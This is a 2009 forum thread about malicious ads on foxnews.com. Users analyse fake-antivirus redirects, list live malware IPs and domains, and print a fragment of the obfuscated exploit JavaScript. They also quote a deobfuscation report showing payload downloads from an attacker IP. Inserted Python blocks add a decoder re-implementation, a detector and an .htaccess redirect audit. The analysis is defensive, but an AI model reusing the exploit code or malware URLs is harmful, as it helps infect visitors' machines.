EGeezer | reply to moonpuppy
Re: foxnews.com infected?
Seriously, my NoScript and AdBlocker take care of the issues. If I need to allow scripting, I do so only for their home domain. It takes care of the malware issue.
La Luna
said by EGeezer: Seriously, my NoScript and AdBlocker take care of the issues. If I need to allow scripting, I do so only for their home domain.
I was just going to ask that question: does AdBlock and/or NoScript prevent this malware? Are you running both, or just one? I tried both a while back and found them extremely annoying, blocking things that shouldn't be blocked like videos, etc. It was torture trying to weed out the bad stuff from the good to get things working.
I also use a simple Firefox add-on called QuickJava that allows me to block both Java and JavaScript on the fly as I see fit on a site-per-site basis, although I'm not sure it would work with this issue as there are multiple domains involved, not just the home domain.
EGeezer
said by La Luna: ... Are you running both, or just one? I tried both a while back and found them extremely annoying, blocking things that shouldn't be blocked like videos, etc. It was torture trying to weed out the bad stuff from the good to get things working.
I run both.
I agree, it's a pain until you learn where the media is usually stored. Thanks for the QuickJava mention - I'll have to try that.
MGD | reply to Cometcom1
I can confirm what other recent posters have experienced today. I now categorize foxnews.com as infested. Remember that a user need only visit a page at foxnews.com to trigger the malware popup. It is not the result of clicking on any ad.
While on this page at 16:57 EST, www.foxnews.com/story/0,2933,517084,00.html, the following was generated:
quote: 19.04.2009 16:57:21 Network Shield: blocked access to malicious site 78.47.132.222/a12/index.php?url=http://truconv.com/?a=125&s=4a12 [ C:\Program Files\Internet Explorer\IEXPLORE.EXE ( 3388 ) ]
Allowing the process to proceed generated this:

Then the page hijacking scan:

A download process of vsm_free_setup.exe also began from toppromooffer.com

While there are many who classify these fake AV programs as "Scareware", I disagree. The first phase of the process involves charging a victim's card ~$70, followed by numerous other charges in the following days and weeks. I have yet to see an infected system that did not have subsequent installs of key loggers and back door trojans that turned it into a bot and enabled remote access. That observation is supported by the repeated analysis of these payload installs.
The downloaded file vsm_free_setup.exe was already in VirusTotal's database from a recent submit, and a fresh analysis of this file generated: www.virustotal.com/analisis/26be···95f80e26 However, if you review the related ThreatExpert analysis: www.threatexpert.com/report.aspx···47a88f8f
Take note of the following excerpts:
------------------------------
Analysis of the file resources indicate the following possible countries of origin:
Russian Federation
Ukraine
------------------------------
Possible Security Risk
Attention! The following threat categories were identified:
• A keylogger program that can capture all user keystrokes (including confidential details such as username, password, credit card number, etc.)
• A program that downloads files to the local computer that may represent security risk
------------------------------
It is indeed disingenuous to only classify these as "Scareware"; that undermines the severity of the crime.
The download location also hosts a benign page for the malware:
Many of the same locations as were listed in the earlier post are showing up once again. AS24940 HETZNER is a repeated cesspool for this genre of virus infections:

Added excerpt for emphasis:
quote: Has this network hosted sites that have distributed malware?
Yes, this network has hosted sites that have distributed malicious software in the past 90 days. We found 85 site(s), including, for example, toppromooffer.com/, bestantimalwarelivescanner.com/, bonuspromooffer.com/, that infected 5596 other site(s), including, for example, portalby.net/, noreastcycling.com/, asiaspa.ie/.
Yes, that is: we found 85 site(s), including, for example, toppromooffer.com, that infected 5,596 other site(s).
Some more observations to follow.
MGD
Edit: Added text
mysec
Thanks for the information!
The Fox News link you gave must be fixed - it didn't redirect anywhere; I used your malware links manually.
I get different results, depending on the browser.
said by MGD: A download process of vsm_free_setup.exe also began from toppromooffer.com
Using Opera, all that happens is the display of a Prompt to Download, which maybe is what you meant:

The victim still has to initiate the download.
BTW - the exploit requires JavaScript to be enabled:
<script language="javascript" src="../../etc/config.js"></script>
<script language="javascript">
//CONFIG.AGRESSION.EX.VAL = 5;
</script>
<SCRIPT src="img/jquery.js" type=text/javascript></SCRIPT>
<SCRIPT src="img/jquery-init.js" type=text/javascript></SCRIPT>
<SCRIPT src="img/flist.js" type=text/javascript></SCRIPT>
<SCRIPT
Without these files, nothing happens. To test, I disabled JavaScript in Opera and got a blank page.
Using IE6 with 78.47.132.... that you gave, the browser locked up and then an alert to a remote code execution exploit:

The Page Code has this (excerpt):
<html><body><script language="javascript">try { function MxKrzZOSqYbxzW(IgKhV){
var tOdCnZgx="",beVpC,PTfki,yemjblcpAo,yAFgXcIB,WGmxZNPUc,zItDdLHBVJ,kjqrOKMSP,IdVpm,sANfyVmBOC;
var gWyitpZ="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
var aRzhby="";
for(IdVpm=0;IdVpm<IgKhV.length;){
yAFgXcIB=gWyitpZ.indexOf(IgKhV.charAt(IdVpm++));
WGmxZNPUc=gWyitpZ.indexOf(IgKhV.charAt(IdVpm++));
sANfyVmBOC=MxKrzZOSqYbxzW;
zItDdLHBVJ=gWyitpZ.indexOf(IgKhV.charAt(IdVpm++));
kjqrOKMSP=gWyitpZ.indexOf(IgKhV.charAt(IdVpm++));
beVpC=(yAFgXcIB<<2)+(WGmxZNPUc>>4);
PTfki=((WGmxZNPUc&15)<<4)+(zItDdLHBVJ>>2);
With some help from Wepawet:
Analysis report for index2[1].htm
Detector Result: malicious
Exploits
1. DirectAnimation PathControl: Heap-based buffer overflow in the DirectAnimation Path Control (DirectAnimation.PathControl) COM object (daxctle.ocx) for Internet Explorer 6.0 - CVE-2006-4777
2. Office Snapshot Viewer: The Microsoft Office Snapshot Viewer ActiveX control allows remote attackers to download arbitrary files to a client machine - CVE-2008-2463
3. MDAC: Arbitrary file download via the Microsoft Data Access Components (MDAC) - CVE-2006-0003
4. WebViewFolder: integer overflow via the setSlice method - CVE-2006-3730
Deobfuscation results
Methods
GetSpecialFolder 2; BuildPath: w32NOFJCyliz5mm5R.exe
GET http://78.47.132.221/a12/aff_12.exe?
Malware
aff_12.exe?u=i_6_0&spl=11: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit
The 3rd exploit (aka MS06-014) is the one I was served up. The clue is:
GetSpecialFolder 2; BuildPath: w32NOFJCyliz5mm5R.exe
Special Folder 2 is code for the Temp folder, and in the alert you can see that this file was not found because aff_12 was blocked from downloading and renaming to w32NOFJCyliz5mm5R.exe.
According to the analysis, all exploits downloaded the same payload.
VirusTotal Result: 2/40 www.virustotal.com/analisis/178d···a2f50448
It is rather common today that a malware site determines the browser and serves up exploits accordingly. All of these are IE6 exploits which would have no effect on other browsers.
This is the 3rd exploit I've seen recently where the exact same thing happens: IE6 gets served a batch of exploits looking for an unpatched vulnerability, Opera gets something else.
This shows a level of sophistication and efficiency on the part of the malware community these days.
I recently downloaded Firefox to test sites. This is what occurred with Javascript enabled in Options:

Even clicking "Ignore" would not load the page. It took me a while to find the security setting.
Trying again, I'm served up a PDF exploit. From the code analysis:
Network Activity
Requests
URL: http://78.47.132.221/a12/pdf.php?u=i_6_0

But it requires the Adobe Acrobat JavaScript plugin, which I've removed:

Different browser, different exploit. And that might change at any time!
And so it goes...
Edit: added code excerpt
rich
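The obfuscated function in the page code excerpt above is a plain base64 decoder: its 65-character string is the standard base64 alphabet, and the two shifts shown are the usual recombination of four 6-bit values into bytes. As an added illustration (not code from this post or from the analysed page), this Python re-implements the visible arithmetic, checks it against the standard library decoder, and flags inline scripts carrying the same fingerprint; the third-byte step and the sample script texts are assumptions/constructed, as marked in the comments.

```python
import base64
import re

# The 65-character string embedded in the excerpt is the standard base64
# alphabet, with "=" (index 64) acting as the padding marker.
ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="


def decode_like_excerpt(encoded: str) -> bytes:
    """Re-implement the arithmetic visible in the excerpt: four alphabet
    indexes a, b, c, d are recombined as (a<<2)+(b>>4) and ((b&15)<<4)+(c>>2).
    The third byte, ((c&3)<<6)+d, is cut off in the excerpt; it is the standard
    base64 step and is assumed here."""
    out = bytearray()
    i = 0
    while i + 3 < len(encoded):
        a, b, c, d = (ALPHABET.index(ch) for ch in encoded[i:i + 4])
        i += 4
        out.append((a << 2) + (b >> 4))
        if c != 64:  # "=" padding: no further bytes in this group
            out.append(((b & 15) << 4) + (c >> 2))
        if d != 64:
            out.append(((c & 3) << 6) + d)
    return bytes(out)


def matches_stdlib(data: bytes) -> bool:
    """Round-trip check: the excerpt's decoder agrees with base64.b64decode."""
    encoded = base64.b64encode(data).decode("ascii")
    return decode_like_excerpt(encoded) == base64.b64decode(encoded) == data


# Fingerprint of this obfuscation style: the full alphabet as a string literal
# in the same script as an indexOf()/charAt() decoding loop.
_ALPHABET_LITERAL = re.compile(re.escape(ALPHABET[:64]))


def looks_like_inline_base64_decoder(script_text: str) -> bool:
    return (_ALPHABET_LITERAL.search(script_text) is not None
            and ".indexOf(" in script_text
            and ".charAt(" in script_text)


# Constructed sample inline scripts (not taken from the analysed page).
SAMPLE_OBFUSCATED = ('function f(s){var t="' + ALPHABET + '";var i=0;'
                     'var a=t.indexOf(s.charAt(i++));return a;}')
SAMPLE_BENIGN = 'document.getElementById("story").innerHTML="ok";'
```

The fingerprint check is deliberately coarse: legitimate libraries also ship base64 routines, so treat a hit as a reason to decode and inspect the payload, not as a verdict on its own.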
reply to moonpuppy
Just to confirm. Still being targeted here as well. Fake antivirus type redirection.
As I expected, there's likely a reinfection timer that checks when an IP was last infected to avoid reinfection over at least 24 hours. - My tests seem to indicate that this is not done with cookies.
Sentinel | reply to moonpuppy
I still have no problems on FoxNews.com. I am using Firefox with NoScript and FlashBlock and I use a hosts file to block ads as well.
reply to moonpuppy
Nothing against foxnews - it's their advertising that is acting up and spreading the malware. Likely without them even realizing this is going on.
I've now established contact with foxnews and they are looking into this very seriously.
Cometcom1
reply to moonpuppy
I left my Home Laptop on over night on Foxnews.com (Nothing Else open) and my Laptop Antivirus (Symantec) Picked Up Bloodhound.Exploit. Also, a user in my office was slammed with 3 different malware issues (She claimed came from Foxnews) and after I cleaned them all I installed the latest Symantec EndPoint Protection and went back to Foxnews.com and sure enough it picked up 3 different malware trojans. It stopped all three and I then removed any IE7 Add-Ons and went back to the site and nothing happened. There is something about that site.
fatness | reply to moonpuppy
Maybe this will provide more of a push for Fox News to deal with this problem: FoxNews.com Serving Up Infected Ads?
reply to moonpuppy
I unfortunately had to ask my entire company to stop visiting FOXNEWS. We will probably end up blacklisting it today via OpenDNS. FOXNEWS better make this a huge priority as I'm certain we are not the first, nor will be the last company to do so. Vundo, Bloodhound, etc. all have been blocked by Symantec AV; however others have crept in and Malwarebytes' AM was used in safe mode as well as Symantec AV to scrub the little PITAs out.
Infection seems to occur via FF and IE7. I'm not in the mood to install adblockers or NoScript company wide.
evergreek | reply to moonpuppy
I received the same pop up yesterday! Scanned my pc, everything seems ok.
reply to JsMOM
Re: foxnews.com infected?
said by JsMOM: Infection seems to occur via FF and IE7. I'm not in the mood to install adblockers or noscript company wide.
Once upon a time, pre Adblock (in its actual block calling and downloading iteration), WebWasher had an application for central deployment that you might want to check out. Just a thought.
reply to mysec
So how does this infection work and is it really such a big deal? How does it actually infect your system?
Doesn't it just exploit some vulnerabilities in the usual suspects (IE, Adobe Reader, Flash, Java etc.) or try to cheat the user to first click yes to the download prompt and then execute their scamware executable? If your software is patched and you have smarts enough to not click yes to everything, is this thing any threat at all? Or is this a problem just for that mass of people who run with unpatched IE under admin account...
Thanks.
said by HowDoesItWork: If your software is patched and you have smarts enough to not click yes to everything, is this thing any threat at all?
Since many users are not aware of the fact that if they try to tell the pop-up "no thanks" by clicking on the usual "close" or "Cancel" buttons they see on their screen, they will probably get the download/install anyway ... I would think that it is a threat to even those with patched machines.
Not everyone knows to use Task Manager or other methods to get out of its grasp.
reply to HowDoesItWork
said by HowDoesItWork: So how does this infection work and is it really such a big deal? How does it actually infect your system?
Doesn't it just exploit some vulnerabilities in the usual suspects (IE, Adobe Reader, Flash, Java etc.) or try to cheat the user to first click yes to the download prompt and then execute their scamware executable? If your software is patched and you have smarts enough to not click yes to everything, is this thing any threat at all? Or is this a problem just for that mass of people who run with unpatched IE under admin account...
Thanks.
I thought my system was fully patched.
I will say that I did NOT initiate any download and I NEVER click on pop-ups or any ads. In fact, IF I see something I like, I will manually copy the link and Google it first.
reply to katarina
quote: Since many users are not aware of the fact that if they try to tell the pop-up "no thanks" by clicking on the usual "close" or "Cancel" buttons they see on their screen, they will probably get the download/install anyway ... I would think that it is a threat to even those with patched machines.
Not everyone knows to use Task Manager or other methods to get out of its grasp.
Shouldn't the browser still display a download dialog prompt, even if the popup is set to download anyway when you click on anything, including the no thanks button? Seems to me that it should, unless there's a serious flaw in the browser that makes it possible to download stuff without the user accepting the download. I mean, even if you click yes on the crapware popup, shouldn't there still be a download prompt from the browser, unless the browser is just insecure by design? Like this:
- you get served with the infected ad and popup
- you realize what's up and click on the X mark to close the popup
- the popup still tries to push the download on you
- your browser should alert you now that someone wants you to download something, and ask if you want to download the file, download and run it, or to just cancel the whole download
If it does work that way, then it's no threat to those who practice basic safe surfing. But I just don't know how this one works.
To moonpuppy, are you saying that you got infected by doing just browsing the site, not accepting any downloads, with a fully patched browser and fully patched plugins (flash, java, the usual)? If so, how does this thing do that? I'm confused.
reply to moonpuppy
This is an FYI to all. After I cleaned my user's PC and upgraded to the newest version of Symantec End Point Protection, the only thing I did was open IE7, type www.foxnews.com, hit enter, and immediately Symantec caught 3 different malware files coming from the site. I didn't even have a chance to click. I am setting up another PC to test with to see if it was a combination of add-ons and IE7 or just IE7.
reply to HowDoesItWork
The actual infection is pretty nicely covered by the existing comments here, but how does this malware actually hide?
The advertising is loaded from the advertising servers, i.e. it might be hosted there or it might be external content that is injected in an iframe.
There are two ways that the fake AV is initiated after this initial advertising loading.
JavaScript redirect - done by hacking the server containing the ad and adding or modifying existing script files.
.htaccess redirect - done by hacking the server containing the ad and forcing a redirect based on the referrer, i.e. the ad can be displayed on multiple sites, but only if it is embedded in particular sites will it trigger a redirect. This is most often seen on search engine redirects.
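Both mysec's observation above that the kit serves different exploits depending on the browser and the .htaccess referrer redirect described in this post come down to server-side rewrite rules keyed on request headers. As an added example (not code from any post here, and not taken from the compromised servers discussed), the Python below audits an .htaccess file for RewriteRules that only fire on HTTP_REFERER or HTTP_USER_AGENT conditions and send the visitor to an external host; the sample .htaccess text and the hostnames in it are constructed.

```python
import re
from typing import Dict, List

# Constructed sample .htaccess (not from any server in the thread): one
# ordinary rule, then a redirect that fires only for visitors arriving from a
# particular site with a particular browser, the pattern described above.
SAMPLE_HTACCESS = """
RewriteEngine On
RewriteRule ^old-page$ /new-page [R=301,L]
RewriteCond %{HTTP_REFERER} example-news-site\\.test [NC]
RewriteCond %{HTTP_USER_AGENT} MSIE\\ 6 [NC]
RewriteRule ^(.*)$ http://attacker-controlled.invalid/landing.php [R,L]
"""

# Server variables that make a rewrite depend on who the visitor is / came from.
CONDITIONAL_VARS = ("%{HTTP_REFERER}", "%{HTTP_USER_AGENT}")
_EXTERNAL_TARGET = re.compile(r"^(https?:)?//", re.IGNORECASE)


def find_conditional_redirects(htaccess_text: str) -> List[Dict[str, object]]:
    """Return every RewriteRule whose preceding RewriteCond chain tests the
    Referer or User-Agent and whose target is an external URL. In mod_rewrite a
    RewriteCond applies to the next RewriteRule, so conditions are collected
    until a rule consumes them."""
    findings: List[Dict[str, object]] = []
    pending_conds: List[str] = []
    for lineno, raw in enumerate(htaccess_text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        directive = parts[0].lower()
        if directive == "rewritecond" and len(parts) >= 3:
            pending_conds.append(line)
        elif directive == "rewriterule" and len(parts) >= 3:
            target = parts[2]
            triggers = [v for v in CONDITIONAL_VARS
                        if any(v in cond for cond in pending_conds)]
            if triggers and _EXTERNAL_TARGET.match(target):
                findings.append({"line": lineno, "target": target,
                                 "triggers": triggers,
                                 "conditions": list(pending_conds)})
            pending_conds = []  # the rule consumes its condition chain
    return findings
```

Run it over the .htaccess files of any server you host third-party ad content on; a referrer- or browser-conditioned redirect to a host you do not own is exactly what a hijacked ad server looks like from the inside.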